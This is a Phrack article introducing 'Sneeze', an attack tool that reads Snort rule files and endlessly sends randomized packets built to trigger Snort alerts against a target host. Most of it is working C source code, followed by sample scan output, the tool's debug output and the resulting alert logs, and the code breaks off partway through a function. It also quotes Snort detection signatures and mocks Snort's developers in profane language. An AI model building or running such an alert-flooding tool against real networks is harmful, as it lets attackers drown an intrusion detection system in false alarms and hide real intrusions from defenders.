                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3e, Phile #0x0d of 0x0f

|=----------------=[ Sneeze: Wreaking Havoc Upon Snort ]=---------------=|
|=----------------------------------------------------------------------=|
|=--------------=[ daemon10 <anonymous@phrack.efnet.ru> ]=--------------=|




1. Introduction

2. Snort Rules
	2.a	Example snort Rule
	2.b	Rule Syntax and Analysis

3. The Code
	3.a	Programming considerations
	3.b	The Holy Grail Itself

4. Outro
	4.a	Self-Promotion
   Bibliography




--[ 1. Introduction to Sneeze

  "I was gonna rip his heart out. I'm the best ever. I'm the most brutal
  and vicious, the most ruthless champion there has ever been. No one can
  stop me. Lennox is a conqueror? No! He's no Alexander! I'm Alexander!
  I'm the best ever. I'm Sonny Liston. I'm Jack Dempsey. There's never
  been anyone like me. I'm from their cloth. There is no one who can
  match me. My style is impetuous, my defense is impregnable, and I'm
  just ferocious. I want his heart! I want to eat his children! Praise be
  to Allah!" 
  - Mike Tyson
 
 
OK, now that I've come up with a wonderfully clever name for my program,
and some great quotes by my favorite heavyweight boxer, it's time to get
down to the code. What is snort? What is sneeze?

  snort    ( P )  Pronunciation Key  (snrt) n.
  A rough, noisy sound made by breathing forcefully through the nostrils,
  as a horse or pig does. 

  sneeze    ( P )  Pronunciation Key  (snz) intr. v.
  To expel air forcibly from the mouth and nose in an explosive, spasmodic
  involuntary action resulting chiefly from irritation of the nasal mucous
  membrane.

From [1],

  "Snort is an open source network intrusion detection system, capable of
  performing real-time traffic analysis and packet logging on IP networks.
  It can perform protocol analysis, content searching/matching and can be
  used to detect a variety of attacks and probes, such as buffer overflows,
  stealth port scans, CGI attacks, SMB probes, OS fingerprinting attempts,
  and much more. 
  Snort uses a flexible rules language to describe traffic that it should
  collect or pass, as well as a detection engine that utilizes a modular
  plugin architecture. Snort has a real-time alerting capability as well,
  incorporating alerting mechanisms for syslog, a user specified file, a
  UNIX socket, or WinPopup messages to Windows clients using Samba's
  smbclient. 
  Snort has three primary uses. It can be used as a straight packet sniffer
  like tcpdump(1), a packet logger (useful for network traffic debugging,
  etc), or as a full blown network intrusion detection system. "

So what is sneeze? As you can guess, it is the exact inversion and
opposite of the popular network IDS tool, snort. Snort wants packets.
Sneeze's job is to send millions and millions of them. Since snort is a
piece of shit with tons of exploitable and DOS'able overflows (which
unfortunately we aren't going to publish simply because they can be fixed
too easily), one might expect that it would also suck at detecting false
positives and floods and the like. Which, it does! Snort purports to be
an excellent way for people who aren't sure how to disable default
services and generally secure their server to detect intrusion attempts.
It is also an official tool of our favorite friends over at Project
Honeynet [2].

In the direct words of the devil himself,

  "Snort-Inline: Currently the Honeynet Project's control capabilities are
  based on IPTables and Snort-Inline. We are looking for people to port
  snort-inline to other firewalls and operating systems, including pf on
  OpenBSD."




--[ 2. Snort Rules

  "I can sell out Madison Square Garden masturbating." 
  - Mike Tyson


Snort is a piece of shit, and a pretty basic piece of shit at that. I'm
not sure exactly who Marty Roesche is, but judging by the sheer volume of
off-by-one's, integer overflows, and logic bugs I found in his code, he
was probably subject at one point to an intense training session by the 
Shmoo Group.

  2.a	Example snort Rule

To generate the sneeze output, we will be using the Snort rule files.
Let's take a look at an example rule file, taken from the snort.org
website [3]:

  SID  209  message  BACKDOOR w00w00 attempt 

  Signature  alert tcp $EXTERNAL_NET any -> $TELNET_SERVERS 23
  (msg:"BACKDOOR w00w00 attempt"; flow:to_server,established;
  content:"w00w00"; reference:arachnids,510; classtype:attempted-admin;
  sid:209; rev:4;)  

  Summary  w00w00 is a Trojan Horse utilizing Telnet. This event is
  generated when an attacker attempts to connect to a w00w00 server using
  Telnet.

  Impact  Possible theft of data and control of the targeted machine
  leading to a compromise of all resources the machine is connected to.
  This Trojan also has the ability to delete data, steal passwords and
  disable the machine.

As one can see, this is an extremely serious and threatening
vulnerability, which lurks to destroy even the most paranoid of admins.
Most snort rules come attached to a plethora of useless verbose
information that we can just ignore. This makes it simple for a network
administrator to see in his log directory the exact time and reason why
he was owned, instead of simply giving a CERT# or exploit name that he
would have to manually reference using a web search engine.

In any case, the rule doesn't say much. Of course, the basic breakdown is
that it the data must occur over an open (established) tcp session. The
traffic must be sent to one of the telnet servers. TELNET_SERVERS is a
snort preprocessor definition which is defined in snort.conf, and is
typically defined to be $HOME_NET. For an unconfigured snort setup,
HOME_NET will match "any" IP, but it can also be set to a subnet range
such as 10.0.0.* or 192.168.0.* or whatever you want it to be. The data
must be flowing "to_server." I'm sure you can figure this out... the
data packet must also contain the string "w00w00." This rule is so simple
we could just telnet to the server and type "w00w00" and trigger the
snort rule if it's set.

Notice how dumb this is: jobe can't even read his mail without
1. Setting off a snort alarm by typing in his password "w00w00"
2. Getting sniffed and owned because he's logging into df.ru via telnet

There's not much to this. Let's look at one last example before we get
into the code.

This example is more complex: RPC mountd UDP export request

  alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"RPC mountd UDP
  export request"; content:"|00 00 00 00|"; offset:4; depth:4;
  content:"|00 01 86 A5|"; offset:12; depth:4; content:"|00 00 00 05|";
  distance:4; within:4; reference:arachnids,26; classtype:attempted-recon;
  sid:1924; rev:4;) 

We have multiple fields to keep our eye on.
Here the packet contents are offset by '|' so we know that the result
will be packed as a hex string. Hex strings can be 1, 2, or 4 bytes,
depending on whether or not there are 2, 4, or 8 adjacent hex string
bytes. For example, 03 is one hex byte, 00003 is a short hex word, etc.

The offset field denotes what offset from the start of the packet the
specified (byte) string will be found at. After an initial match, the
"within" keyword specifies a minimum number of bytes from the last match
that the current match should be found within.

  2.b	Rule Syntax and Analysis

Here is a list of snort keywords with which we will be concerned:

Keyword		Description
-------		-----------
dsize		Specifies a necessary payload data size
			Can be used with <> operators to specify ranges
content		Matches a content string
			Can be combined with ! operator for inversions
offset		Specifies a content offset from the payload start
depth		Specifies maximum number of bytes to search through in
		order to make a content-based match
nocase		Toggle off case-sensitive matching
flow		Flow of traffic
			Can be to_server, from_server, etc.
distance	Specifies minimum byte distance between content matches

There are things we won't be concerned with.
These include:
Preprocessors such as HTTP decode, 
Keyword directs such as Icmp_id

Notice that the snort guides has reams of wonderful, efficient rules to
secure your personal network from pesky intruders:

alert tcp any any -> 192.168.1.0/24 80 (content: "cgi-bin/phf"; \
    offset: 3; depth: 22; msg: "CGI-PHF access";)

Of course, nobody would ever consider sending something like
"GET                     /cgi-bin/blah..." to an HTTP server, so your
depth match will be sure to catch ALL intrusion attempts.

Since the snort rules give vague notions of how data should be arranged
in a malicious packet (apart from the fixed fields specified by the
"content" directive), we can easily create a polymorphic engine which
can repeatedly send all sorts of fake snort triggers, with randomized
data content and data lengths. And that's exactly what we did.




--[ 3. The Code

  "This country was built on rape, slavery, murder, degradation and
  affiliation with crime." 

  - Mike Tyson


  3.a. Programming Considerations

The following program could have been made more complete and thorough by
employing packet construction techniques that matched all possible snort
rule directives. The code below only works on exploits that utilize plain
vanilla TCP connections and UDP attacks. And believe me, there are plenty
of such attacks to go around for everybody. Some rules require special
IP or TCP options to be set, or IP fragmentation, etc. Even though I am
the renowned author of the famous libnet library, and the world's
foremost authority on IP spoofing, TCP hijacking, and packet construction,
I was not able to include these features into sneeze 1.0 because of the
time such features would require. I have a fast car, a girlfriend, and
a complex web of social acquaintances, so... dear reader, as you may have
guessed, I have better things to do than develop free software that meets
all your demands and specifications.

Besides, using standard sockets to do all the work is good because it
allows the program to be run by any user.

Here's some sample output...
First the scan:


Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on juggernaut (192.168.0.6):
(The 1593 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
25/tcp     open        smtp
37/tcp     open        time
79/tcp     open        finger
111/tcp    open        sunrpc
113/tcp    open        auth
587/tcp    open        submission

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
infonexus#


Now, running sneeze with debugging output...

infonexus# ./sneeze juggernaut 21,22,25,37,79,111,113,587 /usr/pkg/share/snort/*.rules
[..... snip .....]
launching attack ...
ATTACK [SMTP expn *@]
     srcport - 0, dstport - 25, proto - tcp, dsize - 0
     offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 7, [expn *@]
ATTACK LEN = 7   :   [eXpN *@]
ATTACK [SMTP sendmail 5.5.5 exploit]
     srcport - 0, dstport - 25, proto - tcp, dsize - 0
     offset = 0, distance = 0, within = 0, case-sensitive = 1, len = 13, [mail from: "|]
ATTACK LEN = 13   :   [mAiL fRoM: "|]
ATTACK [RPC portmap request ypserv]
     srcport - 0, dstport - 111, proto - udp, dsize - 0
     offset = 40, distance = 0, within = 0, case-sensitive = 0, len = 5, [\x01\x86\xa4\x00\x00]
ATTACK LEN = 45   :   [4Yd29qVs0eHcxQBSEfTCJ1m3iRL8vwMPINoZhguW\x01\x00\x00]
^C
infonexus#

Here's the log we see in the other window with our trusty tail -f monitor:
[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959696 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:1450:2] SMTP expn *@ [**]
[Classification: Misc Attack] [Priority: 2]
09/17-19:21:10.959803 192.168.0.1:64383 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51763 IpLen:20 DgmLen:59
***AP*** Seq: 0x10DAD08F  Ack: 0x80636DD1  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423435 65878141
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1200]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965590 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:662:3] SMTP sendmail 5.5.5 exploit [**]
[Classification: Attempted Administrator Privilege Gain] [Priority: 1]
09/17-19:21:12.965701 192.168.0.1:64382 -> 192.168.0.6:25
TCP TTL:64 TOS:0x0 ID:51773 IpLen:20 DgmLen:65
***AP*** Seq: 0x15071B8E  Ack: 0x805FB299  Win: 0x4470  TcpLen: 32
TCP Options (3) => NOP NOP TS: 4423439 65878342
[Xref => http://www.whitehats.com/info/IDS119]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975717 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]

[**] [1:590:2] RPC portmap request ypserv [**]
[Classification: Decode of an RPC Query] [Priority: 2]
09/17-19:21:14.975818 192.168.0.1:63432 -> 192.168.0.6:111
UDP TTL:64 TOS:0x0 ID:51781 IpLen:20 DgmLen:73
Len: 53
[Xref => http://www.whitehats.com/info/IDS12]


  3.b. The Holy Grail Itself

Grab yourself some snort rule files to pipe into this, and then
Start cutting .......


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <netdb.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <time.h>
#include <stdarg.h>

#define XDEBUG		1

/* we can't hope to generate these sorts of packets, so just
   skip them automatically */

char *ignored_keywords[] =
{
	"id",
	"ipoption",
	"fragbits",
	"seq",
	"ack",
	"itype",
	"icode",
	"session",
	"icmp_id",
	"icmp_seq",
	"content-list",
	"uricontent",
	"ip_proto",
	"fragoffset",
	"tos",
	"ttl",
	"byte_test",
	"byte_jump"
};

/* FUCK SNORT */


#define DELAY_TIME		2		/* # seconds between attacks */

#define XMAX(x,y)		(x > y ? x : y)


struct snort_data
{
	unsigned int attack_len;
	unsigned char *attack_data;
	unsigned char case_insensitive;
	unsigned int offset;
	unsigned int distance;
	unsigned int within;
	struct snort_data *next;
};


/* everything should run in user mode... so not ALL attacks will be used */

struct snort_rule {
	char *description;
	unsigned short srcport;
	unsigned short dstport;
	unsigned char protocol;
	unsigned int dsize;
	struct snort_data *sdata;
	struct snort_rule *next;
};


struct snort_rule *ruleslist = NULL;
unsigned int num_rules = 0;


struct snort_rule *select_random_rule (int *availports);
int *read_port_list (char *ports);
void add_rule (char *buf);
int parse_line_data (struct snort_rule *rule, char *line);
void debug_printf (char *fmt, ...);
unsigned short getsrcport (char *portstr, char *proto);
void *parse_content_string (char *line, unsigned int *sizeptr);
void dump_snort_data (struct snort_data *data);
void mix_case (char *ptr, unsigned int len);
void *create_data_packet (struct snort_rule *rule, unsigned int *sizeptr);
void fill_random_data (char *buf, unsigned int len);
int random_number (int lo, int hi);
void *xrealloc (void *ptr, size_t size);



void
usage (char *program)
{
	fprintf (stderr, "Usage: %s <host> <portlist> [rulefile1 rulefile2 ...]\n", program);
	exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{
	FILE *f;
	struct snort_rule *cur;
	struct sockaddr_in s_in, bs_in;
	struct hostent *he;
	char *hostname;
	char *portlist;
	unsigned int i;
	int *ports, fd;

	srand (time (NULL));

	if (argc < 4)
		usage (argv[0]);

	hostname = argv[1];
	portlist = argv[2];

	if ((ports = read_port_list (portlist)) == NULL)
	{
		fprintf (stderr, "Error reading portlist!\n");
		exit (EXIT_FAILURE);
	}

	if ((he = gethostbyname (hostname)) == NULL)
	{
		herror ("gethostbyname");
		exit (EXIT_FAILURE);
	}

	memset (&s_in, 0, sizeof (s_in));
	s_in.sin_family = AF_INET;
	memcpy (&s_in.sin_addr.s_addr, he->h_addr, 4);

	for (i = 3; i < argc; i++)
	{
		char rulebuf[1024];

		f = fopen (argv[i], "r");

		if (f == NULL)
		{
			perror (argv[i]);
			exit (EXIT_FAILURE);
		}

		memset (rulebuf, 0, sizeof (rulebuf));

		while (fgets (rulebuf, sizeof (rulebuf) - 1, f) != NULL)
		{
			add_rule (rulebuf);
			memset (rulebuf, 0, sizeof (rulebuf));
		}

		fclose (f);
	}

	/* wreak havoc */

	printf ("launching attack ...\n");

	while (1)
	{
		char *attack_data = NULL;
		unsigned int attack_len;

		cur = select_random_rule (ports);

		if (cur == NULL)
		{
			fprintf (stderr, "Unexpected error encountered!\n");
			exit (EXIT_FAILURE);
		}

		debug_printf ("ATTACK [%s]\n     srcport - %u, dstport - %u, "
			      "proto - %s, dsize - %d\n",
			      cur->description, cur->srcport, cur->dstport,
			      (cur->protocol == IPPROTO_TCP ? "tcp" : "udp"),
			      cur->dsize);
		dump_snort_data (cur->sdata);

		s_in.sin_port = htons (cur->dstport);

		/* choose a valid open port */
		if (!s_in.sin_port)
			s_in.sin_port = htons (*portlist);

		if (cur->protocol == IPPROTO_TCP)
			fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
		else
			fd = socket (AF_INET, SOCK_DGRAM, IPPROTO_UDP);

		if (fd < 0)
		{
			perror ("socket");
			exit (EXIT_FAILURE);
		}

		/* in case we need to bind to a particular port */

		if (cur->srcport)
		{
			int on = 1;

			memset (&bs_in, 0, sizeof (bs_in));
			bs_in.sin_family = AF_INET;
			bs_in.sin_addr.s_addr = INADDR_ANY;
			bs_in.sin_port = htons (cur->srcport);

			setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof (on));

			if (bind (fd, (struct sockaddr *) &bs_in, sizeof (bs_in)) < 0)
			{
				perror ("bind");
				close (fd);
				continue;
			}

		}

		attack_data = create_data_packet (cur, &attack_len);

		{
                        unsigned int z;
			debug_printf ("ATTACK LEN = %d   :   [", attack_len);

                        for (z = 0; z < attack_len; z++)
                        {

                                if (isprint (attack_data[z]))
                                        debug_printf ("%c", attack_data[z]);
				else
					debug_printf ("\\x%.2x", attack_data[z]);


                        }

                        debug_printf ("]\n");
                }


		if (attack_data == NULL)
		{
			fprintf (stderr, "Unexpected error occurred!\n");
			exit (EXIT_FAILURE);
		}

		if (cur->protocol == IPPROTO_TCP)
		{

			if (connect (fd, (struct sockaddr *) &s_in, sizeof (s_in)) < 0)
			{
				perror ("connect");
				close (fd);
				continue;
			}

			send (fd, attack_data, attack_len, 0);
		}
		else
			sendto (fd, attack_data, attack_len, 0,
				(struct sockaddr *) &s_in, sizeof (s_in));

		close (fd);
		free (attack_data);
		printf ("\n.");

		sleep (DELAY_TIME);
	}

	return 0;
}


#define ABORT_RULE		{ free (rule); return; }

void
add_rule (char *buf)
{
	struct snort_rule *rule;
	char word1[64], word2[64], word3[64], word4[64], word5[64],
	     word6[64], word7[64];
	char *ptr = buf;

	if (buf[0] == '#')
		return;

	buf[strlen (buf) - 1] = 0;

	if ((rule = malloc (sizeof (struct snort_rule))) == NULL)
	{
		perror ("malloc");
		exit (EXIT_FAILURE);
	}

	memset (rule, 0, sizeof (struct snort_rule));
	rule->next = NULL;

	if (sscanf (buf, "%s %s %s %s %s %s %s",
		    word1, word2, word3, word4, word5, word6, word7) != 7)
		ABORT_RULE

	if (strcasecmp (word1, "alert"))
		ABORT_RULE

	if (!strcasecmp (word2, "tcp"))
		rule->protocol = IPPROTO_TCP;
	else if (!strcasecmp (word2, "udp"))
		rule->protocol = IPPROTO_UDP;
	else
		ABORT_RULE

	if ((strcmp (word3, "$EXTERNAL_NET")) && (strcmp (word3, "any")) &&
	    (strcmp (word3, "$HOME_NET")) && (strcmp (word3, "$HTTP_SERVERS"))&&
	    (strcmp (word3, "$SMTP_SERVERS")) && (strcmp (word3, "SQL_SERVERS")) &&
	    (strcmp (word3, "$TELNET_SERVERS")))
		ABORT_RULE

	/* handle multiple source ports by replicating a rule for each port */

	if (strchr (word4, ':'))
	{
		char *dupbuf, *dptr, *dptr2;
		size_t cdiff;

		if ((dupbuf = strdup (buf)) == NULL)
			ABORT_RULE

		if ((dptr = strstr (dupbuf, word4)) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		if ((dptr2 = strchr (dptr, ':')) == NULL)
		{
			free (dupbuf);
			ABORT_RULE
		}

		dptr2++;
		cdiff = (size_t) dptr2 - (size_t) dptr;
		memcpy (dptr, dptr2, strlen (dptr2));
		memset ((dptr + strlen (dptr) - cdiff), 0, cdiff);
		add_rule (dupbuf);
		free (dupbuf);
	}

	if (!strcmp (word4, "any"))
		rule->srcport = 0;
	else
	{
		rule->srcport = getsrcport (word4, word2);

		if (!rule->srcport)
			ABORT_RULE

	}

	/* must go to the server or be bi-directional flow */
	if ((strcmp (word5, "->")) && strcmp (word5, "<>"))
		ABORT_RULE

	/* handle multiple destination ports */

	if (strchr (word7, ':'))
	{
                char *dupbuf, *dptr, *dptr2;
                size_t cdiff;

                if ((dupbuf = strdup (buf)) == NULL)
                        ABORT_RULE

                if ((dptr = strstr (dupbuf, word4)) == NULL)
                {
                        free (dupbuf);
                        ABORT_RULE
                }

                if ((dptr2 = strchr (dptr, ':')) == NULL)
                {
                        free (dupbuf);
                        ABORT_RULE
                }

                dptr2++;
                cdiff = (size_t) dptr2 - (size_t) dptr;
                memcpy (dptr, dptr2, strlen (dptr2));
                memset ((dptr + strlen (dptr) - cdiff), 0, cdiff);
                add_rule (dupbuf);
                free (dupbuf);
	}

	if (!strcmp (word7, "$HTTP_PORTS"))
		rule->dstport = 80;
	else if (!strcmp (word7, "$ORACLE_PORTS"))
		rule->dstport = 1521;
	else if (!strcmp (word7, "$SHELLCODE_PORTS"))
		rule->dstport = 0;
	else if (!strcmp (word7, "any"))
		rule->dstport = 0;
	else
	{
		rule->dstport = getsrcport (word7, word2);

		if (!rule->dstport)
			ABORT_RULE

	}

	ptr = buf;
	rule->sdata = NULL;

	ptr = strchr (buf, '(');

	if (ptr == NULL)
		ABORT_RULE

	if (!parse_line_data (rule, ptr))
	{
		/* success, prepend the rule to the list */

		if (ruleslist == NULL)
			ruleslist = rule;
		else
		{
			rule->next = ruleslist;
			ruleslist = rule;
		}

		num_rules++;

debug_printf ("ADDED RULE - [%s], srcport = %d, dstport = %d, proto = %d\n",
rule->description, rule->srcport, rule->dstport, rule->protocol);
dump_snort_data (rule->sdata);

	}

	return;
}



#define REJECT_RULE		{ rejected = 1; goto done_parsing; }
/* parse the main data into the full snort rule */
/* return 1 if the operation fails, 0 otherwise */

int
parse_line_data (struct snort_rule *rule, char *line)
{
	struct snort_data *sdata = NULL, *last_data = NULL;
	char *ptr, *end_keyword, *begin_data, *end_data;
	unsigned int i;
	unsigned int rejected = 0;

	ptr = line;
	*ptr++ = 0;

	while (1)
	{

		while (isspace (*ptr))
			ptr++;

		if (!*ptr)
			REJECT_RULE
		else if (*ptr == ')')
			goto done_parsing;

		end_keyword = ptr;

		/* rembmer keywords such as nocase take no parameters */
		while (*end_keyword && (*end_keyword != ':') &&
		      (*end_keyword != ';'))
			end_keyword++;

		if (!*end_keyword)
			REJECT_RULE

		*end_keyword++ = 0;

		if (!strlen (ptr))
			REJECT_RULE

		/* check to see if we can handle this keyword */

		for (i = 0; i < (sizeof (ignored_keywords) / sizeof (char *)); i++)
		{

			if (!strcasecmp (ptr, ignored_keywords[i]))
				REJECT_RULE

		}

		/* special case */
		if (!strcasecmp (ptr, "nocase"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->case_insensitive = 1;
			ptr = end_keyword;
			continue;
                }


		begin_data = end_keyword;

		while (isspace (*begin_data))
			begin_data++;

		if (*begin_data == '"')
			begin_data++;

		end_data = begin_data;

		if (*(begin_data - 1) == '"')
		{

			/* take account for escaped string sequences */
			while (*end_data && (*end_data != '"') &&
			      (*(end_data - 1) != '\\'))
				end_data++;
	
			if (!*end_data)
				REJECT_RULE

		}

		if (*end_data == '"')
			*end_data++ = 0;

		end_data = strchr (end_data, ';');

		if (end_data == NULL)
			REJECT_RULE

		*end_data++ = 0;

		/* handle known keywords */

		/* we can only handle a small subset of datasize
		   keywords... don't worry about ranges, only worry
		   about the '>' operator, which will usually only be
		   used to detect overflow attempts */
		if (!strcasecmp (ptr, "dsize"))
		{
			unsigned int gt = 0;

			while (isspace (*begin_data))
				begin_data++;

			/* make sure its an exact number or gt */
			if (!isdigit (*begin_data) && (*begin_data != '>'))
				REJECT_RULE

			/* Exceed '>' directive by x bytes */
			#define GT_INC		16

			if (*begin_data == '>')
			{
				gt = 1;
				begin_data++;
			}

			rule->dsize = atoi (begin_data);

			if (!rule->dsize)
				REJECT_RULE

			if (gt)
				rule->dsize += GT_INC;


		}
		/* msg holds the rule description */
		else if (!strcasecmp (ptr, "msg"))
		{
			rule->description = strdup (begin_data);

			if (rule->description == NULL)
				REJECT_RULE

		}
		else if (!strcasecmp (ptr, "content"))
		{
			/* we can't handle inverted content matches */
			if (*begin_data == '!')
				REJECT_RULE

			sdata = malloc (sizeof (struct snort_data));

			if (sdata == NULL)
				REJECT_RULE

			memset (sdata, 0, sizeof (struct snort_data));

			if (last_data == NULL)
			{
				rule->sdata = sdata;
				last_data = sdata;
			}
			else
			{
				last_data->next = sdata;
				last_data = sdata;
			}

			sdata->attack_data = parse_content_string (begin_data,
				&(sdata->attack_len));

			if (sdata->attack_data == NULL)
				REJECT_RULE

		}
		/*
		 * only handle a very special case of flags....
		 * basically anything that doesnt have to do with the ACK flag
		 * will be filtered out, because we can't handle raw scans...
		 * I don't know why flags:A+ is sometimes specified but it is...
		 */
		else if (!strcasecmp (ptr, "flags"))
		{
			char *fptr;

			fptr = begin_data;

			while (isspace (*fptr))
				fptr++;

			if (strncmp (fptr, "A+", 2))
				REJECT_RULE

		}
		else if (!strcasecmp (ptr, "offset"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->offset = atoi (begin_data);
		}
		else if (!strcasecmp (ptr, "distance"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->distance = atoi (begin_data);
		}
		else if (!strcasecmp (ptr, "within"))
		{

			if (sdata == NULL)
				REJECT_RULE

			sdata->within = atoi (begin_data);
		}

		ptr = end_data;
	}


done_parsing:
	if (rejected)
	{
		struct snort_data *dptr = rule->sdata;
		/* destroy the rule information */

		while (dptr != NULL)
		{
			struct snort_data *cur;

			cur = dptr;
			dptr = dptr->next;

			if (cur->attack_data != NULL)
				free (cur->attack_data);

			free (cur);
		}

		free (rule);
		return 1;
	}

	return 0;
}


/* comma-delimited list of portnames from command line input */

int *
read_port_list (char *ports)
{
	char *ptr = ports;
	int *portlist = NULL, num;
	unsigned int nitems = 0;

	while (ptr != NULL && *ptr)
	{
		ptr = strchr (ports, ',');

		if (ptr != NULL)
			*ptr++ = 0;

		num = atoi (ports);

		if (!num)
			return NULL;

		ports = ptr;
		nitems++;

		portlist = xrealloc (portlist, (sizeof (int *) * (nitems + 1)));
		portlist[nitems - 1] = num;
		portlist[nitems] = 0;
	}

	return portlist;
}


/* target a random attack, picked out of availports */

struct snort_rule *
select_random_rule (int *availports)
{
	struct snort_rule *r;
	unsigned short num;
	unsigned int i = 0;
	int *pptr;

	num = random_number (0, num_rules - 1);
	r = ruleslist;

	while (i < num)
	{

		r = r->next;

		if (r == NULL)
			r = ruleslist;


		for (pptr = availports; *pptr; pptr++)
		{

			if (r->dstport == *pptr)
			{
				i++;
			}

		}

	}

	return r;
}


/* verbose logging */

void
debug_printf (char *fmt, ...)
{
#ifdef XDEBUG
	va_list ap;
	char outbuf[1024];

	memset (outbuf, 0, sizeof (outbuf));
	va_start (ap, fmt);
	vsnprintf (outbuf, sizeof (outbuf) - 1, fmt, ap);
	fprintf (stderr, "%s", outbuf);
	va_end (ap);
#endif

	return;
}


/* convert a string to a port number */

unsigned short
getsrcport (char *portstr, char *proto)
{
	struct servent *se;
	unsigned short result;

	if (portstr == NULL)
		return 0;

	result = atoi (portstr);

	if (result)
		return result;

	if ((se = getservbyname (portstr, proto)) == NULL)
		return 0;

	result = ntohs (se->s_port);
	return result;
}


#define ABORT_PARSE		{ free (databuf); return NULL; }

/* parse content line...
   return the buffer and store its length in sizeptr */

void *
parse_content_string (char *line, unsigned int *sizeptr)
{
	char *ptr, *databuf = NULL;
	char *ptr2, *ptr3;

	*sizeptr = 0;
	ptr = ptr2 = line;

	while (*ptr)
	{

		/* regular character or escaped pipe */

		if ((*ptr != '|') || ((*ptr == '|') && (*(ptr - 1) == '\\')))
		{
			(*sizeptr)++;
			databuf = xrealloc (databuf, *sizeptr);
			databuf[*sizeptr - 1] = *ptr;
			ptr++;
		}
		else
		{
			unsigned char numbuf[16];
			unsigned char byte;
			unsigned short word;
			unsigned long dword, dlen;

			/* deal with raw data in hex format */
			ptr++;

			while (*ptr)
			{
				unsigned char saved_char;

				while (isspace (*ptr))
					ptr++;

				/* reached end of raw hex */
				if (*ptr == '|')
				{
					ptr++;
					goto outer_loop;
				}

				for (ptr3 = ptr; (*ptr3 && (*ptr3 != '|') && (!isspace (*ptr3))); ptr3++)
					;

				saved_char = *ptr3;

				if (!saved_char)
					ABORT_PARSE

				*ptr3++ = 0;
				memset (numbuf, 0, sizeof (numbuf));
				strncpy (numbuf, ptr, sizeof (numbuf) - 1);
				ptr = ptr3;

				/* determine whether we are reading a
				* hex byte, word, or double word */

				if (strlen (numbuf) <= 2)
				{
					dlen = 1;
					byte = strtoul (numbuf, NULL, 16);
				}
				else if (strlen (numbuf) <= 4)
				{
					dlen = 2;
					word = htons ((unsigned short) strtoul (numbuf, NULL, 16));
				}
				else if (strlen (numbuf) <= 8)
				{
					dlen = 4;
					dword = htonl (strtoul (numbuf, NULL, 16));
				}
				else
					/* can't handle this yet */
					ABORT_PARSE	

				*sizeptr += dlen;
				databuf = xrealloc (databuf, *sizeptr);

				if (dlen == 1)
					databuf[*sizeptr - 1] = byte;
				else if (dlen == 2)
					memcpy (&databuf[*sizeptr - 2], &word, 2);
				else if (dlen == 4)
					memcpy (&databuf[*sizeptr - 4], &dword, 4);

				if (saved_char == '|')
					goto outer_loop;

                                }

outer_loop:
                        }

                }

	ptr = ptr2;

        if (!*sizeptr)
		ABORT_PARSE

	return databuf;
}


void
dump_snort_data (struct snort_data *data)
{
#ifdef XDEBUG
	struct snort_data *ptr;

	for (ptr = data; ptr != NULL; ptr = ptr->next)
	{
		unsigned int i;

		fprintf (stderr, "     offset = %d, distance = %d, within = %d, "
			 "case-sensitive = %d, len = %d, [",
			ptr->offset, ptr->distance, ptr->within,
			ptr->case_insensitive, ptr->attack_len);

		for (i = 0; i < ptr->attack_len; i++)
		{

			if (isprint (ptr->attack_data[i]))
				fprintf (stderr, "%c", ptr->attack_data[i]);
			else
				fprintf (stderr, "\\x%.2x",
					(unsigned char) ptr->attack_data[i]);

		}

		fprintf (stderr, "]\n");
	}
#endif

	return;
}


/* Mix the case of a case-insensitive string */

void
mix_case (char *ptr, unsigned int len)
{
	unsigned int i;

	for (i = 0; i < len; i++)
	{

		if (!isalpha (ptr[i]))
			continue;

		if ((rand ()) % 2)
			ptr[i] = tolower (ptr[i]);
		else
			ptr[i] = toupper (ptr[i]);

	}

	return;
}


/* using a snort rule framework, create a packet using polymorphism */

void *
create_data_packet (struct snort_rule *rule, unsigned int *sizeptr)
{
	struct snort_data *sptr;
	char *buf = NULL, *ptr;
	unsigned int buflen = 0;

	for (sptr = rule->sdata; sptr != NULL; sptr = sptr->next)
	{
		unsigned int inclen, oldlen, pos;

		pos = oldlen = buflen;
		buflen = XMAX(buflen, sptr->offset);

		buf = xrealloc (buf, buflen);
		ptr = buf;
		ptr += oldlen;
